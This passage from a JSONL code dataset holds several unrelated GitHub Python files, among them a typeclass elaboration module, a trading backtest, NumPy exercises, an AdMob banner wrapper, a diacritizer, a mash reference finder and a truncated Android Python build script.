self.getAFromName(q.tc.name)\n assert len(tList) == len(aList)\n assert all(tList[i].equals(aList[i]) for i in range(len(tList)))\n return self.closure(qiNew) + [q.tc]\n\n def elaborate(self):\n gcE = 
deepcopy(self)\n gcE.elements = deepcopy(self.elements)\n gcNew = IGC([])\n while len(gcE.elements) > 0:\n element = gcE.removeLastElement()\n gcNew.insertElement(element.elaborate(self))\n return gcNew\n\n def inGC(self, aList: List[FDTypeA], tau: FDTau):\n for element in self.elements:\n tList = element.tc.tList\n if element.sigma.getTau().equals(tau) and len(tList) == len(aList) and all(\n tList[i].equals(aList[i]) for i in range(len(aList))):\n return True\n return False\n\n def getFDFromName(self, name):\n for elem in self.elements:\n if elem.tc.name == name:\n return elem.fd\n raise NotFoundError(\"Typeclass with name \" + name + \"was not found in the context.\")\n\n def getDependants(self, tc):\n aList = self.getAFromName(tc.name)\n fdList = self.getFDFromName(tc.name).aList2\n return substitute(tc.tList, aList, fdList)\n\n\nclass FDGamma(FDAbstractGamma):\n elements = []\n\n def __init__(self, gammaList: List[FDGammaElem]):\n super().__init__()\n self.elements = gammaList\n\n def addElement(self, element: FDGammaElem):\n self.elements.append(element)\n\n def addElements(self, elements: List[FDGammaElem]):\n self.elements = self.elements + elements\n\n def contains(self, item: FDGammaElem) -> bool:\n return any(element.equals(item) for element in self.elements)\n\n def containsTypeVar(self, item: FDTypeA) -> bool:\n return any(element.equals(FDGammaA(item)) for element in self.elements)\n\n def getSigmaFromX(self, x: str) -> FDSigma:\n for element in self.elements:\n if isinstance(element, FDGammaX) and element.x == x:\n return element.sigma\n raise NotFoundError(\"Variable with name \" + x + \"was not found in the context.\")\n\n def equals(self, gamma: FDAbstractGamma):\n return (len(gamma.elements) == len(self.elements)\n and all(gamma.elements[i].equals(self.elements[i]) for i in range(len(self.elements))))\n\n def setElements(self, elements: List[FDGammaElem]):\n self.elements = elements\n\n def elaborate(self, p: FDAbstractP, gc: FDAbstractGC):\n gammaE = deepcopy(self)\n gammaE.elements = deepcopy(self.elements)\n gammaNew = IGamma([])\n while len(gammaE.elements) > 0:\n element = gammaE.removeLastElement()\n gammaNew.insertElement(element.elaborate(p, gc))\n return gammaNew\n\n def getDeltaIndex(self):\n i = 0\n for element in self.elements:\n if isinstance(element, FDGammaQ):\n i += 1\n return i\n\n def getDeltaOfGammaQ(self, gammaQ: FDGammaQ):\n i = 0\n for element in self.elements:\n if isinstance(element, FDGammaQ):\n if element.equals(gammaQ):\n return i\n else:\n i += 1\n raise NotFoundError(\"Constraint was not found in the context.\")\n\n\ndef substitute(tList, aList1, aList2):\n assert len(tList) == len(aList1)\n result = deepcopy(aList2)\n for i in range(len(aList1)):\n for j in range(len(aList2)):\n if aList1[i] == aList2[j]:\n result[j] = tList[i]\n return result\n\n\nclass FDP(FDAbstractP):\n elements = []\n\n def __init__(self):\n super().__init__()\n self.elements = []\n\n def addElement(self, element: FDPElemAbstract):\n self.elements.append(element)\n\n def addElements(self, elements: List[FDPElemAbstract]):\n self.elements = self.elements + elements\n\n def wellFormed(self, gc: FDGC, gamma: FDGamma) -> bool:\n if len(self.elements) == 0:\n if len(gamma.elements) == 0:\n if len(gc.elements) == 0:\n # sCtx-empty\n return True\n else:\n # sCtx-clsEnv\n gcNew = deepcopy(gc)\n gcNew.elements = deepcopy(gc.elements)\n element = gcNew.removeLastElement()\n gammaNew = FDGamma(list(map(lambda a: FDGammaA(a), element.tc.tList)))\n sigma = element.sigma\n aj = 
sigma.getVariables() + element.tc.tList\n return (sigma.wellTyped(gammaNew, gcNew)\n and all(any(a.equals(fv) for fv in sigma.getTau().getFreeVars()) for a in aj)\n and all(FDQ(tc).wellFormed(gammaNew, gcNew) for tc in element.tcList)\n and all(not (element.m == gcElem.m) for gcElem in gcNew.elements)\n and all(not (element.tc.name == gcElem.tc.name) for gcElem in gcNew.elements)\n and self.wellFormed(gcNew, gamma))\n else:\n gammaNew = deepcopy(gamma)\n gammaNew.elements = deepcopy(gamma.elements)\n element = gammaNew.removeLastElement()\n if isinstance(element, FDGammaX):\n # sCtx-TyEnvTm\n return (element.sigma.wellTyped(gammaNew, gc)\n and all(not (isinstance(g, FDGammaX) and g.x == element.x) for g in gammaNew.elements)\n and self.wellFormed(gc, gammaNew))\n elif isinstance(element, FDGammaA):\n # sCtx-TyEnvTy\n return (all(not (isinstance(g, FDGammaA) and g.equals(element)) for g in gammaNew.elements)\n and self.wellFormed(gc, gammaNew))\n elif isinstance(element, FDGammaQ):\n # sCtx-TyEnvD\n return (element.q.wellFormed(gammaNew, gc)\n and self.wellFormed(gc, gammaNew))\n else:\n return False\n else:\n # sCtx-PgmInst\n pNew = deepcopy(self)\n pNew.elements = deepcopy(self.elements)\n element = pNew.removeLastElement()\n tList = element.c.q.tc.tList\n bj = element.c.aList\n gammaElements = list(map(lambda a: FDGammaA(a), bj))\n gammaElements += list(map(lambda q: FDGammaQ(q), element.c.qList))\n tc = gc.getTCFromMethod(element.m)\n sigma = gc.getSigmaFromMethod(element.m)\n gammaElements += list(map(lambda a: FDGammaA(a), sigma.getVariables()))\n gammaElements += list(map(lambda q: FDGammaQ(FDQSubst(tList, tc.tList, q)), sigma.getConstraints()))\n gammaNew = FDGamma(gammaElements)\n tauSubst = FDTypeSubst(tList, tc.tList, sigma.getTau())\n for i in range(len(pNew.elements)):\n if pNew.elements[i].c.q.tc.name == tc.name:\n bk = pNew.elements[i].c.aList\n tOtherList = pNew.elements[i].c.q.tc.tList\n if all(tList[j].equalsWithVars(bj, tOtherList[j], bk) for j in range(len(tList))):\n return False\n\n return (element.gamma.equals(gammaNew)\n and element.c.unambiguous(pNew, gc)\n and element.c.wellFormed(FDGamma([]), gc)\n and element.e.hasType(pNew, gc, gammaNew, tauSubst)\n and sigma.wellTyped(FDGamma(list(map(lambda a: FDGammaA(a), tc.tList))), gc)\n and pNew.wellFormed(gc, gamma))\n\n def getQiFromQ(self, q: FDQ):\n for element in self.elements:\n if element.c.q.equals(q):\n return element.c.qList\n raise NotFoundError(\"Instantiation with typeclass \" + q.tc.name + \"was not found in the context.\")\n\n def getDFromQ(self, q: FDQ):\n for i in range(len(self.elements)):\n element = self.elements[i]\n if element.c.q.equals(q):\n return i\n raise NotFoundError(\"Instantiation with typeclass \" + q.tc.name + \"was not found in the context.\")\n\n def elaborate(self, gc: FDGC):\n pE = deepcopy(self)\n pE.elements = deepcopy(self.elements)\n pNew = IP()\n\n while len(pE.elements) > 0:\n element = pE.removeLastElement()\n bj = element.c.aList\n qi = element.c.qList\n sigma = gc.getSigmaFromName(element.c.q.tc.name)\n ak = sigma.getVariables()\n qh = sigma.getConstraints()\n t = element.c.q.tc.tList\n a = gc.getAFromName(element.c.q.tc.name)\n tNew = sigma.getTau()\n gammaNew = FDGamma(list(map(lambda bi: FDGammaA(bi), bj))\n + list(map(lambda qj: FDGammaQ(qj), qi))\n + list(map(lambda ai: FDGammaA(ai), ak))\n + list(map(lambda qj: FDGammaQ(qj), qh)))\n e = element.e.elaborateWithType(pE, gc, gammaNew, FDTypeSubst(t, a, tNew))\n delta = len(qi) + len(qh)\n for q in qh:\n e = 
ITermQAbs(DictionaryDelta(delta), FDQSubst(t, a, q).elaborate(pNew, gc), e)\n delta -= 1\n for a in ak:\n e = ITermTypeAbs(a.elaborate(), e)\n for q in qi:\n e = ITermQAbs(DictionaryDelta(delta), q.elaborate(), e)\n delta -= 1\n for a in bj:\n e = ITermTypeAbs(a.elaborate(), e)\n pNew.insertElement(IPElem(element.c.elaborate(gc), element.m, e))\n return pNew\n\n def hasFunctionalDependency(self, gc: FDGC, tc: FDTCTau):\n aList = gc.getAFromName(tc.name)\n tList = tc.tList\n fdList = gc.getFDFromName(tc.name).aList1\n fdResult = substitute(tList, aList, fdList)\n if len(fdList) == 0:\n return False\n for element in self.elements:\n if element.c.q.tc.name == tc.name:\n fdResult2 = substitute(element.c.q.tc.tList, aList, fdList)\n if all(fdResult[i].equals(fdResult2[i]) for i in range(len(fdResult))):\n return True\n return False\n\n def getFunctionalDependency(self, gc: FDGC, tc: FDTCTau):\n aList = gc.getAFromName(tc.name)\n tList = tc.tList\n fdList = gc.getFDFromName(tc.name).aList1\n fdResult = substitute(tList, aList, fdList)\n for element in self.elements:\n if element.c.q.tc.name == tc.name:\n fdResult2 = substitute(element.c.q.tc.tList, aList, fdList)\n if all(fdResult[i].equals(fdResult2[i]) for i in range(len(fdResult))):\n return element.c.q.tc\n","repo_name":"LenaDooms/Implementatie","sub_path":"SourceLanguageFD/Environment/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":14127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71741554361","text":"import backtesting\nfrom backtesting import Backtest, Strategy\nimport pandas as pd\nimport numpy as np\n\n# Define your custom strategy\nclass TrendFollowingStrategy(Strategy):\n\n def init(self):\n self.in_upward_trend = False\n self.upward_trend_start = None\n self.upward_trend_duration = None\n\n def next(self):\n if not self.in_upward_trend and self.data['close'] > self.data['close'].shift(1):\n self.in_upward_trend = True\n self.upward_trend_start = self.data.datetime.iloc[-1]\n elif self.in_upward_trend and self.data.datetime.iloc[-1] - self.upward_trend_start >= pd.Timedelta(hours=self.upward_trend_duration * 0.8):\n self.in_upward_trend = False\n self.sell()\n\n if not self.in_upward_trend and self.data['close'] < self.data['close'].shift(1):\n self.in_upward_trend = False\n\n# Load and preprocess data\ndata = pd.read_csv('your_file.csv')\ndata['datetime'] = pd.to_datetime(data['datetime'])\ndata = data.set_index('datetime')\n\n# Calculate average upward trend duration\ntrends = calculate_trends(data)\nupward_durations = []\n\nfor trend in trends:\n if trend[0] == 'Upward':\n duration = calculate_duration(trend)\n upward_durations.append(duration)\n\navg_upward_duration = np.mean(upward_durations)\n\n# Calculate the sell duration\nsell_duration = avg_upward_duration * 0.8\n\n# Configure the strategy with the average trend duration\nbt = Backtest(data, TrendFollowingStrategy, cash=100000, commission=0)\nbt.strategy.upward_trend_duration = avg_upward_duration\n\n# Run the backtest\nbt.run()\n\n# Plot the backtest results\nbt.plot()","repo_name":"molenaar/Trading-Algos-By-Moon-Dev","sub_path":"trend_is_fren/trend_bt.py","file_name":"trend_bt.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31361871575","text":"# 11 Write a NumPy program to convert a list and tuple into arrays.\r\nimport numpy as np\r\n\r\nlist1 = 
[1,2,3,4,5]\r\nprint(np.asarray(list1))\r\n\r\ntuple1 = ([7,7,7],[8,8,8])\r\nprint(np.asarray(tuple1))\r\n\r\n# 12 Write a NumPy program to append values to the end of an array.\r\n\r\nimport numpy as np\r\n\r\na = np.array([10,15,20])\r\nprint(np.append(a,[[25,30,35],[40,45,50]]))\r\n\r\n# numpy.append(arr, values, axis=None)\r\n\r\n# 13 Write a NumPy program to create an empty and a full array.\r\n\r\nimport numpy as np\r\n\r\na = np.empty((3,3))\r\nprint(a)\r\n\r\nb = np.full((3,3),6)\r\nprint(b)\r\n","repo_name":"Viola8/Python-NLP-Libraries","sub_path":"numpy11_12_13.py","file_name":"numpy11_12_13.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24331075065","text":"'''\nYou're the shift manager at a new ice cream store opening. To ensure everyone \ngets a chance to taste the new flavors, there is a limit of one serving per person.\n\nYou notice that people are not following this rule and are coming back into the line\nto get another serving of ice cream.\n\nGiven an array of people's names, return True if you come across a person you've already\nseen in line. Otherwise, False.\n\nCan you think of any data structures that might help?\n \n\nEXAMPLE(S)\nA line with people ['Pixel', 'Pinky', 'Oliver'] should return False, as there are no people coming back.\nA line with people ['Neko', 'Moose', 'Neko'] should return True, since Neko decided to come back.\n \n\nFUNCTION SIGNATURE\ndef seenYouBefore(patrons: list) -> bool:\n'''\n\n\ndef seenYouBefore(patrons: list) -> bool:\n patron_set = set()\n\n for patron in patrons:\n if patron in patron_set:\n return True\n else:\n patron_set.add(patron)\n\n return False\n\n\nprint(seenYouBefore([]) == False)\nprint(seenYouBefore(['Sweet Tea', 'Oliver', 'Pinky',\n 'Sweet Tea', 'Pixel', 'Jelly']) == True)\nprint(seenYouBefore(['Neko', 'Neko']) == True)\nprint(seenYouBefore(['Moose', 'Porkchop', 'Sweet Tea', 'Hercules']) == False)\n","repo_name":"jonathanyulan99/SDE-Fundamentals","sub_path":"ALL/Formation/Set_Drills/seen_you_before.py","file_name":"seen_you_before.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9922660350","text":"\"\"\"program to determine whether students need to see an advisor based on mean and standard deviation\r\nyasha longstaff\r\n13 may 2014\"\"\"\r\n\r\nimport math\r\n\r\nfilename = input('Enter the marks filename:\\n')\r\n\r\nfile = open(filename, \"r\")\r\nmarks = file.readlines()\r\nfile.close()\r\n\r\naggregate = 0\r\nfor item in marks:\r\n position = item.find(',')\r\n aggregate += eval(item[position+1:])\r\nmean = \"{0:.2f}\".format(aggregate/len(marks))\r\n\r\ndeviation = 0\r\nvariance_squared = 0\r\nfor item in marks:\r\n position = item.find(',')\r\n deviation = (float(item[position+1:])- float(mean))**2\r\n variance_squared += deviation\r\nvariance = math.sqrt((variance_squared)/len(marks))\r\n\r\nprint('The average is:', mean)\r\nprint('The std deviation is:', \"{0:.2f}\".format(variance))\r\n\r\niter = False\r\n\r\nfor item in marks:\r\n if iter == False:\r\n print('List of students who need to see an advisor:')\r\n iter = True\r\n\r\n position = item.find(',')\r\n if eval(item[position+1:]) < (float(mean) - float(variance)):\r\n print(item[:position])\r\n else:\r\n continue\r\n 
\r\n\r\n\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_9/lngyas001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15890888031","text":"import plyer\nfrom kivy import platform, Logger\n\n__version__ = '1.0'\n\nif platform == \"android\":\n try:\n from jnius import autoclass, cast, PythonJavaClass, java_method\n from android.runnable import run_on_ui_thread\n\n activity = autoclass(\"org.kivy.android.PythonActivity\")\n\n AdRequest = autoclass(\"com.google.android.gms.ads.AdRequest\")\n AdRequestBuilder = autoclass(\n \"com.google.android.gms.ads.AdRequest$Builder\"\n )\n\n AdSize = autoclass(\"com.google.android.gms.ads.AdSize\")\n AdView = autoclass(\"com.google.android.gms.ads.AdView\")\n MobileAds = autoclass(\"com.google.android.gms.ads.MobileAds\")\n LayoutParams = autoclass(\"android.view.ViewGroup$LayoutParams\")\n LinearLayout = autoclass(\"android.widget.LinearLayout\")\n Gravity = autoclass(\"android.view.Gravity\")\n View = autoclass(\"android.view.View\")\n\n except Exception as err:\n Logger.error(\"KivyBannerMob: \" + str(err))\nelse:\n\n def run_on_ui_thread(x):\n pass\n\n\nclass TestIds:\n \"\"\" Test AdMob App ID \"\"\"\n APP = \"ca-app-pub-3940256099942544~3347511713\"\n\n \"\"\" Test Banner Ad unit ID \"\"\"\n BANNER = \"ca-app-pub-3940256099942544/6300978111\"\n\n\nclass AdMobBridge:\n def __init__(self, appID):\n pass\n\n def add_test_device(self, test_device):\n pass\n\n def load_banner_ad(self, bannerID):\n pass\n\n def show_banner(self):\n pass\n\n\nclass Admob(AdMobBridge):\n @run_on_ui_thread\n def __init__(self, appID, useTestDevice):\n super().__init__(appID)\n if useTestDevice:\n MobileAds.initialize(activity.mActivity, TestIds.APP)\n else:\n Logger.info(\"KivyBannerMob: Admob App ID initialized with \" + str(appID))\n MobileAds.initialize(activity.mActivity, appID)\n\n self._adview = AdView(activity.mActivity)\n self.useTestDevice = useTestDevice\n self._test_devices = []\n\n @run_on_ui_thread\n def load_banner_ad(self, bannerID):\n\n if self.useTestDevice:\n self._adview.setAdUnitId(TestIds.BANNER)\n else:\n Logger.info(\"KivyBannerMob: BannerAd using unit ID \" + str(bannerID))\n self._adview.setAdUnitId(bannerID)\n\n self._adview.setAdSize(AdSize.SMART_BANNER)\n\n self._adview.setVisibility(View.GONE)\n adLayoutParams = LayoutParams(\n LayoutParams.MATCH_PARENT, LayoutParams.WRAP_CONTENT\n )\n self._adview.setLayoutParams(adLayoutParams)\n layout = LinearLayout(activity.mActivity)\n layout.setGravity(Gravity.BOTTOM)\n layout.addView(self._adview)\n layoutParams = LayoutParams(\n LayoutParams.MATCH_PARENT, LayoutParams.MATCH_PARENT\n )\n layout.setLayoutParams(layoutParams)\n activity.addContentView(layout, layoutParams)\n\n self.builder = AdRequestBuilder()\n\n if self.useTestDevice:\n Logger.info(\"KivyBannerMob: Adding Test Device: \" + str(plyer.uniqueid.id))\n self.add_test_device(str(plyer.uniqueid.id))\n else:\n Logger.info(\"KivyBannerMob: Showing live ads from Admob\")\n\n Logger.info(\"KivyBannerMob: AdView loaded.\")\n self._adview.loadAd(self.builder.build())\n\n @run_on_ui_thread\n def add_test_device(self, test_device):\n for test_device in self._test_devices:\n self.builder.addTestDevice(test_device)\n\n @run_on_ui_thread\n def show_banner(self):\n Logger.info(\"KivyBannerMob: show_banner called.\")\n self._adview.setVisibility(View.VISIBLE)\n\n @run_on_ui_thread\n 
def hide_banner(self):\n        Logger.info(\"KivyBannerMob: hide_banner called.\")\n        self._adview.setVisibility(View.GONE)\n\n\nclass KivyBannerMob:\n    def __init__(self, appID, useTestDevice=True):\n        Logger.info(\"KivyBannerMob: __init__ called.\")\n        if platform == \"android\":\n            # Setting the flag below to True overrides your appID and bannerID to use test ads :)\n            self.bridge = Admob(appID, useTestDevice)  # app ID\n        else:\n            Logger.warning(\"KivyBannerMob: This only runs on Android devices\")\n\n    def load_banner_ad(self, unitID):\n        self.bridge.load_banner_ad(unitID)  # ad unit ID\n\n    def show_banner(self):\n        self.bridge.show_banner()\n\n    def hide_banner(self):\n        self.bridge.hide_banner()","repo_name":"ziyaad30/KivyBannerMob","sub_path":"src/KivyBannerMob/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70169754682","text":"import numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\n\r\n# Load the vocabulary\r\nvocabulary = np.load('vocabulary.npy', allow_pickle=True).item()\r\n\r\n# Load the encoded input data\r\ninput_padded_sequences = np.load('encoded_input_data.npy')\r\n\r\n# Get the maximum sequence length\r\nmax_seq_length = input_padded_sequences.shape[1]\r\n\r\n# Define the special tokens\r\nstart_token = ''\r\nend_token = ''\r\npad_token = ''\r\n\r\n# Load the saved model\r\nmodel = tf.keras.models.load_model('diacritizer.h5')\r\n\r\n# Define a function to diacritize a single sentence\r\ndef diacritize_sentence(sentence, model, vocabulary):\r\n    reverse_vocabulary = {idx: char for char, idx in vocabulary.items()}\r\n\r\n    sentence = sentence.lower()\r\n\r\n    # Encode the input sentence\r\n    input_encoded = []\r\n    for char in sentence:\r\n        if char in 'aeiou':\r\n            input_encoded += [vocabulary[start_token], vocabulary[char], vocabulary[end_token]]\r\n        else:\r\n            input_encoded += [vocabulary[char]]\r\n\r\n    # Pad the encoded input sentence\r\n    input_padded = pad_sequences([input_encoded], maxlen=max_seq_length, padding='post', value=vocabulary[pad_token])\r\n    print(input_padded)\r\n\r\n    # Diacritize the sentence by predicting the output sequence using the model\r\n    output_padded = model.predict([input_padded, np.zeros((1, max_seq_length))])[0]\r\n    print(output_padded)\r\n    output_encoded = [np.argmax(token) for token in output_padded]\r\n    \r\n    # Find the position of the final end_token in the output sequence\r\n    end_token_positions = [i for i, val in enumerate(output_encoded) if val == vocabulary[end_token]]\r\n    if end_token_positions:\r\n        end_position = end_token_positions[-1]\r\n    else:\r\n        end_position = len(output_encoded)\r\n\r\n    output_sequence = [reverse_vocabulary[val] for val in output_encoded[:end_position] if val != vocabulary[pad_token]]\r\n    output_sentence = ''.join(output_sequence)\r\n\r\n    return output_sentence\r\n\r\n# Define an example sentence\r\nsentence = \"Ko te whare tenei o nga tangata katoa\"\r\n\r\n# Diacritize the sentence\r\ndiacritized_sentence = diacritize_sentence(sentence, model, vocabulary)\r\n\r\n# Print the original and diacritized sentences\r\nprint(f\"Original sentence: {sentence}\")\r\nprint(f\"Diacritized sentence: {diacritized_sentence}\")","repo_name":"cmnakano/midiacritizer","sub_path":"diacritize.py","file_name":"diacritize.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
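A minimal sketch (assuming this dump is saved locally as records.jsonl, a hypothetical name) of how the JSONL records above can be loaded and the embedded source files pulled out; the field names are taken from the records themselves:

import json

# Each record is one JSON object per line; in this diff every record line is prefixed with "+".
with open("records.jsonl", "r", encoding="utf-8") as fh:
    for line in fh:
        line = line.lstrip("+").strip()
        if not line.startswith("{"):
            continue  # skip diff headers and blank lines
        rec = json.loads(line)
        # "text" carries the raw source; the remaining fields are path/language metadata.
        print(rec["repo_name"], rec["sub_path"], rec["program_lang"], rec["file_size_in_byte"])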
+{"seq_id":"19938073878","text":"from gmpy2 import next_prime, is_prime\nfrom itertools import permutations, combinations\n\nn = 999\n\nwhile True:\n n = next_prime(n)\n primes = []\n for perm in set(permutations(str(n))):\n if is_prime(int(''.join(perm))):\n primes.append(perm)\n \n for c in combinations(primes, 3):\n c = list(map(lambda x: int(''.join(x)), c))\n c.sort()\n if c[1] - c[0] == 3330 and c[2] - c[1] == 3330:\n ans = ''.join(map(str, c))\n if ans == '148748178147':\n continue\n print('The answer is: {}'.format(ans))\n exit(0)","repo_name":"MaximeGoyette/projecteuler","sub_path":"049.py","file_name":"049.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69808929400","text":"#!/usr/bin/env python\n'''\n\nChange HEADER CRPIX3 (channel) and write a new fits file, so that channel map labels can be symmetric across systemic velocity\n\nLast Modified: 4 May 2016\n\nAuthor: Daisy Leung\n\nHistory:\n04 May 2016\n - GILDAS don't recognize the unit of velocity axis: write extra cube with hdr[\"CTYPE3\"] = \"VELO-LSR\"\n30 Apr 2016\n - created, works with COchan.py\n\nNote:\n-\n\n'''\n\n\nimport pywcs\nimport pyfits\n\nfinal_image = '/Users/admin/Research/RXJ1131/PdBI/data/30Apr16/sup127_155_2ndcln_noCont.fits'\nfits_cube = pyfits.open(final_image)\nheader = fits_cube[0].header\n# Use channel 145 as 0 km/s, chosen using `go view` and also corresponds to z~0.654\nheader['CRPIX3'] = 145.0\n\n# sanity check\nwcs = pywcs.WCS(header)\nx = wcs.sub([3])\nx.wcs_pix2sky([[130]], 0)/1e3\nx.wcs_pix2sky([[145]], 0)/1e3\n\n# this works with COchan.py, don't mess with it\noutfile = '/Users/admin/Research/RXJ1131/PdBI/data/30Apr16/centralizedCube.fits'\nfits_cube.writeto(outfile, clobber=True)\n\n# write an additional cube with hdr[\"CTYPE3\"] = \"VELO-LSR\"\nheader['CTYPE3'] = \"VELO-LSR\"\noutfile = '/Users/admin/Research/RXJ1131/PdBI/data/30Apr16/centralizedCube4GILDAS.fits'\nfits_cube.writeto(outfile, clobber=True)\n","repo_name":"astro313/RXJ1131","sub_path":"PdBI/src/pythonPLOT/shiftRefVelo.py","file_name":"shiftRefVelo.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26789221272","text":"\"\"\"\nGiven a list of FASTQ files, and a list of reference sequences,\nuse mash to calculate the distance, and then find the closest \nreference sequence to the FASTQ files. 
Return the path to the \nclosest reference sequence.\n\"\"\"\n\nimport argparse\nimport asyncio\nimport pathlib\nimport re\nimport urllib.request\n\n# WEBENV = re.compile(r'<WebEnv>(\S+)</WebEnv>')\n# KEY = re.compile(r'<QueryKey>(\d+)</QueryKey>')\n# ASM_RELEASE_DATE_GENBANK = re.compile('(\S+_')\n# ASM_RELEASE_DATE_REFSEQ = re.compile('(\S+)')\n\n\ndef parse_args():\n    \"\"\"\n    Parse the command line arguments.\n    \"\"\"\n    parser = argparse.ArgumentParser(description=\"Find the closest reference sequence to a set of FASTQ files.\")\n    parser.add_argument(\"-f\", \"--fastq\", nargs=\"+\", help=\"FASTQ files to compare to the reference sequences.\", required=True, type=pathlib.Path)\n    parser.add_argument(\"-r\", \"--ref\", nargs=\"+\", help=\"Reference sequences to compare the FASTQ files to.\", required=True, type=pathlib.Path)\n    parser.add_argument(\"-t\", \"--threads\", help=\"Number of threads to use.\", default=1, type=int)\n    parser.add_argument(\"-e\", \"--email\", help=\"Email address to use for Entrez.\", default=\"andersgs+entrez@gmail.com\")\n    return parser.parse_args()\n\n\nasync def run_mash(reads, ref):\n    \"\"\"\n    Run mash.\n    \"\"\"\n    cmd = f\"mash dist {ref} {' '.join([str(r) for r in reads])}\"\n    proc = await asyncio.create_subprocess_shell(\n        cmd,\n        stdout=asyncio.subprocess.PIPE,\n        stderr=asyncio.subprocess.PIPE\n    )\n    stdout, _ = await proc.communicate()\n    return stdout.decode('utf-8')\n\n\n# async def search_entrez(term, email):\n#     \"\"\"\n#     Search Entrez for a term.\n#     \"\"\"\n#     base = 'https://eutils.ncbi.nlm.nih.gov/entrez/eutils/'\n#     db = 'assembly'\n#     url = f\"{base}esearch.fcgi?db={db}&term={term}&usehistory=y\"\n#     request = urllib.request.urlopen(url)\n#     data = request.read().decode('utf-8')\n#     webenv = WEBENV.search(data).group(1)\n#     key = KEY.search(data).group(1)\n#     url = base + f\"esummary.fcgi?db={db}&query_key={key}&WebEnv={webenv}\"\n\n\nasync def safe_mash(reads, ref, sem):\n    \"\"\"\n    Add mash to the task queue using a semaphore to limit the number of threads.\n    \"\"\"\n    async with sem:\n        return await run_mash(reads, ref)\n\n\nasync def main():\n    \"\"\"\n    Main function.\n    \"\"\"\n    args = parse_args()\n    sem = asyncio.Semaphore(args.threads)\n    fastq_files = args.fastq\n    ref_files = args.ref\n    tasks = [\n        asyncio.ensure_future(safe_mash(fastq_files, ref, sem)) for ref in ref_files\n    ]\n    results = await asyncio.gather(*tasks)\n    dists = []\n    for result in results:\n        data = [res.split(\"\\t\") for res in result.strip().split(\"\\n\")]\n        mean_dist = sum([float(d[2]) for d in data]) / len(data)\n        dists.append([data[0][0], mean_dist])\n    dists.sort(key=lambda x: x[1])\n    min_mean_dist = dists[0][1]\n    suitable_refs = [d[0] for d in dists if d[1] == min_mean_dist]\n    if len(suitable_refs) > 1:\n        print(f\"Multiple reference sequences found with the same distance to the FASTQ files. 
Please check the reference sequences.\")\n        print(suitable_refs)\n\n\nif __name__ == \"__main__\":\n    asyncio.run(main())\n","repo_name":"lgi-onehealth/orkas","sub_path":"bin/find_ref.py","file_name":"find_ref.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"44150685715","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport sys\nimport os\nimport shutil\nimport json\nimport time\n\ndef run(*command, cwd=None):\n    print(command)\n    try:\n        result = subprocess.run(command, cwd=cwd)\n    except OSError:\n        return 127, []\n    return result.returncode, \"\" # TODO\n\ndef read_properties(fname):\n    data = {}\n    with open(fname, 'r') as f:\n        for line in f:\n            fields = [x.strip() for x in line.split('=')]\n            data[fields[0]] = fields[1]\n    return data\n\ndef check_git():\n    rcode, stdout = run('git', '--version')\n    return rcode == 0\n\ndef check_python():\n    if os.path.exists('python'):\n        if not os.path.isdir('python'):\n            return 1\n        else:\n            if os.path.exists('python/.git'):\n                return 2\n            else:\n                return 1\n    else:\n        return 0\n\ndef check_ndk(ndk_dir, min_ver, checking_sub=False):\n    if not os.path.exists(ndk_dir):\n        return 1\n    if os.path.exists(ndk_dir + '/source.properties'):\n        info = read_properties(ndk_dir + '/source.properties')\n        if not 'Pkg.Revision' in info:\n            return 1\n        vn = [int(x) for x in info['Pkg.Revision'].split('.')]\n        for i in range(len(vn)):\n            if i >= len(min_ver):\n                print('versions equal')\n                return 0\n            elif vn[i] > min_ver[i]:\n                print('later version')\n                return 0\n            elif vn[i] < min_ver[i]:\n                print('earlier version')\n                return 1\n        print('versions equal')\n        return 0\n    else:\n        return 1\n\ndef trymkdir(dir):\n    if not os.path.exists(dir):\n        os.mkdir(dir)\n        return 0\n    elif not os.path.isdir(dir):\n        print(\"'%s' exists and is a file. Please move or delete it.\" % dir)\n        return 1\n    else:\n        return 0\n\ndef copy(src, dest):\n    print(\"%s -> %s\" % (src, dest))\n    shutil.copy(src, dest)\n\ndef main():\n    start_time = time.perf_counter()\n    print(\"Building Python for Android 24 64-bit ARM (aarch64-linux-android)\")\n    print(\"Checking/installing dependencies\")\n\n    # TODO arguments\n    py_version='v3.9.2'\n    ndk_dir=os.getenv('HOME') + '/Android/Sdk/ndk/22.0.7026061'\n    ndk_min_ver=(22,)\n    make_jobs=6\n    target='aarch64-linux-android'\n    android_ver='24'\n    shell='/usr/bin/bash'\n    make='/usr/bin/make'\n    tar='/usr/bin/tar'\n    force_build=False\n\n    if not check_git():\n        print(\"Could not find Git. Is it in your PATH?\")\n        sys.exit(1)\n\n    res = check_python()\n    if res == 1:\n        print(\"'python' is already a file or directory. Please delete or move it.\")\n        sys.exit(1)\n    elif res == 2:\n        print(\"'python' submodule found\")\n    else:\n        rval = run('git', 'submodule', 'update')[0]\n        if rval != 0:\n            print(\"Clone failed!\")\n            sys.exit(2)\n\n    print(\"Checkout version '%s'\" % 